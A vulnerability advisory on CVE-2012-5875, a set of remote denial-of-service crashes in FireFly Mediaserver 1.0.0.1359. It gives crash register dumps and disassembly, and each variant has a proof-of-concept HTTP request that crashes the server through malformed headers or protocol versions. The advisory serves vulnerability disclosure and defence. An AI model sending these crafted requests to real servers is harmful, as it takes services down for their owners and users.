FireFly Mediaserver 1.0.0.1359 NULL Pointer Dereference

Product: FireFly Mediaserver
Vendor: FireFly
Vulnerable Version(s): 1.0.0.1359 and probably prior
Tested Version: 1.0.0.1359 in Windows 7 SP1
Vendor Notification: November 21, 2012 
Public Disclosure: December 19, 2012 
Vulnerability Type: NULL Pointer Dereference [CWE-476]
CVE Reference: CVE-2012-5875
CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
Risk Level: Medium 
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab has discovered multiple remote denial of service (DoS) vulnerabilities in FireFly MediaServer, which could be exploited by a malicious person to crash a remote server.


1) Multiple NULL pointer dereference vulnerabilities in Firefly MediaServer: CVE-2012-5875

1.1 The vulnerability exists due to improper handling of the HTTP CONNECTION header within the "firefly.exe" binary file. A remote attacker can send a specially crafted packet to 9999/TCP port (FireFly's server default port) with improper CONNECTION header value, leading to a NULL pointer dereference that will cause vulnerable server to crash immediately.

Crash Details:

EIP: 0041e223 cmp byte [ecx],0x20
EAX: 0175eee8 (  24506088) -> xxxxxxx_xxxx_ (stack)
EBX: 00000000 (         0) -> N/A
ECX: 00000000 (         0) -> N/A
EDX: 0175eef0 (  24506096) -> n 0n-us,en;q=0.5U) (stack)
EDI: 0175eee8 (  24506088) -> xxxxxxx_xxxx_ (stack)
ESI: 0175eef5 (  24506101) -> 0n-us,en;q=0.5U) (stack)
EBP: 00708830 (   7374896) -> p3xpPppHFF../../../../ (heap)
ESP: 0175eed0 (  24506064) -> u0p xxxxxxx_xxxx_n 0n-us,en;q=0.5U) (stack)
  +00: 00000000 (         0) -> N/A
  +04: 00000001 (         1) -> N/A
  +08: 0175ff80 (  24510336) -> uw0</er<uuu\[email protected])|</er<uu|0|Aw<[email protected]@ (stack)
  +0c: 00708830 (   7374896) -> p3xpPppHFF../../../../ (heap)
  +10: 00000000 (         0) -> N/A
  +14: 00000007 (         7) -> N/A


Disasm around:

  0x0041e206 jnz 0x41e223
  0x0041e208 mov edx,[ebp+0x4]
  0x0041e20b push edi
  0x0041e20c push edx
  0x0041e20d push dword 0x4525e0
  0x0041e212 push byte 0x2
  0x0041e214 push byte 0x2
  0x0041e216 call 0x40ea90
  0x0041e21b add esp,0x14
  0x0041e21e jmp 0x41e160
  0x0041e223 cmp byte [ecx],0x20
  0x0041e226 jnz 0x41e232
  0x0041e228 inc ecx
  0x0041e229 mov [esp+0x10],ecx
  0x0041e22d cmp byte [ecx],0x20
  0x0041e230 jz 0x41e228
  0x0041e232 mov eax,ecx
  0x0041e234 lea esi,[eax+0x1]
  0x0041e237 mov dl,[eax]
  0x0041e239 inc eax
  0x0041e23a cmp dl,bl


Proof of Concept:
The following HTTP request will crash the vulnerable Firefly server remotely:

GET / HTTP/1.1
Host: vulnhost.local
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: xxxxxxx_xxxx_
Referer: http://www.host.com



1.2 The vulnerability exists due to improper handling of the ACCEPT-LANGUAGE, USER-AGENT and HOST HTTP header parameters within the "firefly.exe" binary file. A remote attacker can send a specially crafted packet to port 9999/TCP with a malformed header containing a control character of return carriage ("\r\n") that will cause a NULL pointer dereference and immediate termination of the vulnerable server.

The following examples demonstrate the vulnerabilities:

a) ACCEPT-LANGUAGE

Crash details:

EIP: 0041e223 cmp byte [ecx],0x20
EAX: 0175eee8 (  24506088) -> (stack)
EBX: 00000000 (         0) -> N/A
ECX: 00000000 (         0) -> N/A
EDX: 0175eef0 (  24506096) -> nguage /5.0 (Windows; U) (stack)
EDI: 0175eee8 (  24506088) -> (stack)
ESI: 0175eefa (  24506106) -> /5.0 (Windows; U) (stack)
EBP: 00708830 (   7374896) -> p3xxpppHFF (heap)
ESP: 0175eed0 (  24506064) -> u0pguage /5.0 (Windows; U) (stack)
+00: 00000000 (         0) -> N/A
+04: 00000001 (         1) -> N/A
+08: 0175ff80 (  24510336) -> uw0</er<uuu\[email protected])|</er<uu|0|Aw<[email protected] x (stack)
+0c: 00708830 (   7374896) -> p3xxpppHFF (heap)
+10: 00000000 (         0) -> N/A
+14: 00000007 (         7) -> N/A


Disasm around:

  0x0041e206 jnz 0x41e223
  0x0041e208 mov edx,[ebp+0x4]
  0x0041e20b push edi
  0x0041e20c push edx
  0x0041e20d push dword 0x4525e0
  0x0041e212 push byte 0x2
  0x0041e214 push byte 0x2
  0x0041e216 call 0x40ea90
  0x0041e21b add esp,0x14
  0x0041e21e jmp 0x41e160
  0x0041e223 cmp byte [ecx],0x20
  0x0041e226 jnz 0x41e232
  0x0041e228 inc ecx
  0x0041e229 mov [esp+0x10],ecx
  0x0041e22d cmp byte [ecx],0x20
  0x0041e230 jz 0x41e228
  0x0041e232 mov eax,ecx
  0x0041e234 lea esi,[eax+0x1]
  0x0041e237 mov dl,[eax]
  0x0041e239 inc eax
  0x0041e23a cmp dl,bl


Proof of concept:
The following HTTP request will crash the vulnerable Firefly server remotely:

GET / HTTP/1.1
Host: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us
en;q=0.5
\r\n
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.host.com



b) USER-AGENT

Crash details

EIP: 0041e223 cmp byte [ecx],0x20
EAX: 0175eee8 (  24506088) -> xxxxxxx (stack)
EBX: 00000000 (         0) -> N/A
ECX: 00000000 (         0) -> N/A
EDX: 0175eef0 (  24506096) -> t t (stack)
EDI: 0175eee8 (  24506088) -> xxxxxxx(stack)
ESI: 0175eef5 (  24506101) -> t (stack)
EBP: 007087d8 (   7374808) -> p>ppPp<p (heap)
ESP: 0175eed0 (  24506064) -> upxxxxxxxt t (stack)
  +00: 00000000 (         0) -> N/A
  +04: 00000001 (         1) -> N/A
  +08: 0175ff80 (  24510336) -> N/A
  +0c: 007087d8 (   7374808) -> p>ppPp<p (heap)
  +10: 00000000 (         0) -> N/A
  +14: 00000007 (         7) -> N/A


Disasm around:

  0x0041e206 jnz 0x41e223
  0x0041e208 mov edx,[ebp+0x4]
  0x0041e20b push edi
  0x0041e20c push edx
  0x0041e20d push dword 0x4525e0
  0x0041e212 push byte 0x2
  0x0041e214 push byte 0x2
  0x0041e216 call 0x40ea90
  0x0041e21b add esp,0x14
  0x0041e21e jmp 0x41e160
  0x0041e223 cmp byte [ecx],0x20
  0x0041e226 jnz 0x41e232
  0x0041e228 inc ecx
  0x0041e229 mov [esp+0x10],ecx
  0x0041e22d cmp byte [ecx],0x20
  0x0041e230 jz 0x41e228
  0x0041e232 mov eax,ecx
  0x0041e234 lea esi,[eax+0x1]
  0x0041e237 mov dl,[eax]
  0x0041e239 inc eax
  0x0041e23a cmp dl,bl


Proof of concept:
The following HTTP request will crash the vulnerable Firefly server remotely:

GET / HTTP/1.1
Host: somehost.com
User-Agent: 
xxxxxxx
\r\n
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.host.com



c) HOST

Crash Details:

EIP: 0041e223 cmp byte [ecx],0x20
EAX: 0175eee8 (  24506088) -> xxxxxxx (stack)
EBX: 00000000 (         0) -> N/A
ECX: 00000000 (         0) -> N/A
EDX: 0175eef0 (  24506096) ->  (stack)
EDI: 0175eee8 (  24506088) -> xxxxxxx (stack)
ESI: 0175eeef (  24506095) ->  (stack)
EBP: 00708830 (   7374896) -> p!ppp\pHFF"& (heap)
ESP: 0175eed0 (  24506064) -> u0pxxxxxxx (stack)
+00: 00000000 (         0) -> N/A
+04: 00000001 (         1) -> N/A
+08: 0175ff80 (  24510336) -> N/A
+0c: 00708830 (   7374896) -> p!ppp\pHFF"& (heap)
  +10: 00000000 (         0) -> N/A
  +14: 00000007 (         7) -> N/A


Disasm around:

  0x0041e206 jnz 0x41e223
  0x0041e208 mov edx,[ebp+0x4]
  0x0041e20b push edi
  0x0041e20c push edx
  0x0041e20d push dword 0x4525e0
  0x0041e212 push byte 0x2
  0x0041e214 push byte 0x2
  0x0041e216 call 0x40ea90
  0x0041e21b add esp,0x14
  0x0041e21e jmp 0x41e160
  0x0041e223 cmp byte [ecx],0x20
  0x0041e226 jnz 0x41e232
  0x0041e228 inc ecx
  0x0041e229 mov [esp+0x10],ecx
  0x0041e22d cmp byte [ecx],0x20
  0x0041e230 jz 0x41e228
  0x0041e232 mov eax,ecx
  0x0041e234 lea esi,[eax+0x1]
  0x0041e237 mov dl,[eax]
  0x0041e239 inc eax
  0x0041e23a cmp dl,bl


Proof of concept:
The following HTTP request will crash the vulnerable Firefly server remotely:

GET / HTTP/1.1
Host: xxxxxxx\r\n
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.host.com



1.3 The vulnerability exists due to improper handling of the HTTP POST and GET methods within the "firefly.exe" binary file. A remote attacker can send a specially crafted packet to 9999/TCP port with an improper HTTP POST or GET request containing an erroneous HTTP protocol version, or one or more control characters of return carriage ("\r\n") leading to a NULL pointer dereference that will cause the vulnerable server to crash immediately.

The following examples demonstrate the vulnerabilities:

a) HTTP POST

Crash details:

EIP: 0041e223 cmp byte [ecx],0x20
EAX: 0175eee8 (  24506088) -> xxxxxxx (stack)
EBX: 00000000 (         0) -> N/A
ECX: 00000000 (         0) -> N/A
EDX: 0175eef0 (  24506096) ->  (stack)
EDI: 0175eee8 (  24506088) -> xxxxxxx (stack)
ESI: 00000001 (         1) -> N/A
EBP: 007087d8 (   7374808) -> ppPpatp (heap)
ESP: 0175eed0 (  24506064) -> upxxxxxxx (stack)
+00: 00000000 (         0) -> N/A
+04: 00000001 (         1) -> N/A
+08: 0175ff80 (  24510336) -> N/A
+0c: 007087d8 (   7374808) -> ppPpatp (heap)
+10: 00000000 (         0) -> N/A
+14: 00000007 (         7) -> N/A


Disasm around:

  0x0041e206 jnz 0x41e223
  0x0041e208 mov edx,[ebp+0x4]
  0x0041e20b push edi
  0x0041e20c push edx
  0x0041e20d push dword 0x4525e0
  0x0041e212 push byte 0x2
  0x0041e214 push byte 0x2
  0x0041e216 call 0x40ea90
  0x0041e21b add esp,0x14
  0x0041e21e jmp 0x41e160
  0x0041e223 cmp byte [ecx],0x20
  0x0041e226 jnz 0x41e232
  0x0041e228 inc ecx
  0x0041e229 mov [esp+0x10],ecx
  0x0041e22d cmp byte [ecx],0x20
  0x0041e230 jz 0x41e228
  0x0041e232 mov eax,ecx
  0x0041e234 lea esi,[eax+0x1]
  0x0041e237 mov dl,[eax]
  0x0041e239 inc eax
  0x0041e23a cmp dl,b


Proof of concept:
The following HTTP request will crash the vulnerable Firefly server remotely:

POST /index.html HTTP/
xxxxxxxx
.1



b) HTTP GET

Crash details:

EIP: 0041e223 cmp byte [ecx],0x20
EAX: 0175eee8 (  24506088) -> xxxxxxx (stack)
EBX: 00000000 (         0) -> N/A
ECX: 00000000 (         0) -> N/A
EDX: 0175eef0 (  24506096) ->  (stack)
EDI: 0175eee8 (  24506088) -> xxxxxxx (stack)
 ESI: 00000001 (         1) -> N/A
EBP: 00708830 (   7374896) -> p!pppHFF#) (heap)
ESP: 0175eed0 (  24506064) -> u0pxxxxxxx (stack)
+00: 00000000 (         0) -> N/A
+04: 00000001 (         1) -> N/A
+08: 0175ff80 (  24510336) -> N/A
+0c: 00708830 (   7374896) -> p!pppHFF#) (heap)
+10: 00000000 (         0) -> N/A
+14: 00000007 (         7) -> N/A


Disasm around:

  0x0041e206 jnz 0x41e223
  0x0041e208 mov edx,[ebp+0x4]
  0x0041e20b push edi
  0x0041e20c push edx
  0x0041e20d push dword 0x4525e0
  0x0041e212 push byte 0x2
  0x0041e214 push byte 0x2
  0x0041e216 call 0x40ea90
  0x0041e21b add esp,0x14
  0x0041e21e jmp 0x41e160
  0x0041e223 cmp byte [ecx],0x20
  0x0041e226 jnz 0x41e232
  0x0041e228 inc ecx
  0x0041e229 mov [esp+0x10],ecx
  0x0041e22d cmp byte [ecx],0x20
  0x0041e230 jz 0x41e228
  0x0041e232 mov eax,ecx
  0x0041e234 lea esi,[eax+0x1]
  0x0041e237 mov dl,[eax]
  0x0041e239 inc eax
  0x0041e23a cmp dl,bl


Proof of concept #1:
The following HTTP request will crash the vulnerable Firefly server remotely:

GET /index.html HTTP/xxxxxxxx.1


Proof of concept #2:
The following HTTP request will crash the vulnerable Firefly server remotely:

GET /index.html HTTP/
xxxxxxxx.1




-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23129 - https://www.htbridge.com/advisory/HTB23129 - Firefly MediaServer Multiple Remote DoS vulnerabilities.
[2] Firefly - http://www.fireflymediaserver.org - Firefly MediaServer distributes your music, videos and photos easily over your network.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 

-----------------------------------------------------------------------------------------------

#  0day.today [2018-04-06]  #